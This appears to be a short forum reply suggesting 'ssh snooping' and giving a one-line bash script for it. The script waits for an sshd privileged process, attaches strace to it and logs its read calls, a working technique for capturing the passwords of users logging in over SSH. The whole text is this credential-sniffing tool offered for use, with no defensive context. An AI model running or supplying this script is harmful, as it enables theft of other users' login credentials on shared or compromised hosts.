You may try ssh snooping..
#!/bin/bash while true; do ps_test=`ps ax|grep sshd|grep -v grep|grep priv|tr -s ' '` if [ -n "$ps_test" ] then f=$RANDOM a="output$RANDOM.log" strace -e trace=read -p $(echo $ps_test | awk '{print $1}') -o $f cat $f | grep 'read(6,' > $a rm $f chown root:root $a chmod 600 $a else echo -e ".\c" sleep 0.1 fi done